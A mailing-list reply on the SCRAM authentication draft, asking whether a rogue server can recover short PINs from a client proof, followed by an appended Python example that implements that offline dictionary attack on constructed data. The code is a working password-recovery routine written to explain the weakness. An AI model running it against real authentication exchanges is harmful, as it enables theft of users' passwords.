Dave Cridland wrote:
> Have you got any figures on timescales for this, and computing power
> required? I mean, is this something that anyone who hasn't upset the
> NSA or GCHQ should be concerned about, or are we within reasonable
> range of someone trying to phish credit card numbers?
http://tools.ietf.org/html/draft-newman-auth-scram-08 Section 7:

  The amount of time necessary for this attack depends on the
  cryptographic hash function selected, the strength of the password
  and the iteration count supplied by the server.

Looking at how SCRAM works, with an iteration count of 1 and my stupid PIN passwords (four digits) I'm sure every laptop today can hack it (there are only 10000 possible passwords). The iteration count is set by the server, so I'm not sure it adds additional security. The MITM will be the server for one client, so I guess it is too easy.

I'm no security expert, but:

A ---- MITM ---- B

A thinks it requests the channel bindings with B but it does so with MITM. It sends a username to MITM and MITM chooses salt and iteration count.

AuthMessage := client-first-message + "," + server-first-message + "," + final-client-message-without-proof
ClientSignature := HMAC(StoredKey, AuthMessage)
ClientProof := ClientKey XOR ClientSignature

The MITM must calculate this for every possible StoredKey/ClientKey. Even with an iteration count, it can calculate that in advance. It has a dictionary with 10000 entries (pin, StoredKey, ClientKey), always using the same salt. Therefore the MITM needs to calculate:

HMAC(StoredKey, AuthMessage) XOR ClientKey

It shouldn't take long to do this 10000 times and compare the result with what the client sent as ClientProof. If the MITM is done with that, it knows the password to play A to B.

Or did I miss something? Alexey, you are the expert here.

Dirk

-- 
A good programmer is someone who looks both ways before crossing a one-way street. - Doug Linder
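The attack Dirk sketches, worked through in code as an added example (this is editorial example code, not from the thread, the draft, or any SCRAM implementation). It follows the SCRAM-SHA-1 key derivation (SaltedPassword := Hi(password, salt, i), ClientKey := HMAC(SaltedPassword, "Client Key"), StoredKey := H(ClientKey), ClientProof := ClientKey XOR HMAC(StoredKey, AuthMessage)), with Hi() implemented as PBKDF2-HMAC-SHA-1. The rogue server (MITM) fixes the salt and the iteration count, precomputes (pin, ClientKey, StoredKey) for all 10000 four-digit PINs once, and then needs only one HMAC per candidate to test an observed ClientProof. The PIN, salt, nonces and messages are all constructed for the example:

```python
import base64
import hashlib
import hmac

# Rogue-server (MITM) dictionary attack on a SCRAM client proof, following the
# sketch in Dirk's message. Everything here is constructed for the example:
# the PIN, the salt, the nonces and the messages are made up, not captured.

HASH = "sha1"  # SCRAM-SHA-1, the mechanism the draft defines

# The whole password space for a four-digit PIN: 0000 .. 9999.
PIN_SPACE = [f"{n:04d}".encode() for n in range(10000)]


def h(data: bytes) -> bytes:
    return hashlib.new(HASH, data).digest()


def hmac_(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, HASH).digest()


def hi(password: bytes, salt: bytes, iterations: int) -> bytes:
    # Hi() in SCRAM is PBKDF2 with HMAC as the PRF and a single output block.
    return hashlib.pbkdf2_hmac(HASH, password, salt, iterations)


def derive_keys(password: bytes, salt: bytes, iterations: int):
    """ClientKey and StoredKey depend only on password, salt and iteration count."""
    salted_password = hi(password, salt, iterations)
    client_key = hmac_(salted_password, b"Client Key")
    stored_key = h(client_key)
    return client_key, stored_key


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def client_proof(password: bytes, salt: bytes, iterations: int,
                 auth_message: bytes) -> bytes:
    """What an honest client sends: ClientKey XOR HMAC(StoredKey, AuthMessage)."""
    client_key, stored_key = derive_keys(password, salt, iterations)
    return xor(client_key, hmac_(stored_key, auth_message))


def precompute_table(salt: bytes, iterations: int, candidates):
    # The MITM picked salt and iteration count itself, so this table can be
    # built before any client connects and reused against every client.
    return {pw: derive_keys(pw, salt, iterations) for pw in candidates}


def recover_password(table, auth_message: bytes, observed_proof: bytes):
    # One HMAC per candidate per observed proof; the PBKDF2 work (the only
    # place the iteration count matters) was already paid in precompute_table().
    for pw, (client_key, stored_key) in table.items():
        if xor(client_key, hmac_(stored_key, auth_message)) == observed_proof:
            return pw
    return None


def demo(pin: bytes = b"4711", iterations: int = 1):
    """One fake exchange: client A authenticates to the MITM with `pin`;
    the MITM recovers the PIN from the proof alone. Returns the recovered PIN."""
    salt = b"same-salt-for-everyone"  # chosen by the MITM, constructed
    table = precompute_table(salt, iterations, PIN_SPACE)

    # Constructed SCRAM messages (nonces are placeholders, not random).
    client_first = b"n=alice,r=clientnonce"
    server_first = (b"r=clientnonceservernonce,s="
                    + base64.b64encode(salt) + b",i=%d" % iterations)
    client_final_without_proof = b"c=biws,r=clientnonceservernonce"
    auth_message = b",".join([client_first, server_first,
                              client_final_without_proof])

    proof = client_proof(pin, salt, iterations, auth_message)  # A's ClientProof
    return recover_password(table, auth_message, proof)


if __name__ == "__main__":
    print(demo())  # recovers b'4711'
```

Raising the iteration count only makes precompute_table() slower, and the MITM pays that once, offline, with a salt of its own choosing; the per-proof cost in recover_password() stays at one HMAC per candidate regardless of the count. The search space, not the iteration count, is what decides whether the attack is cheap.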
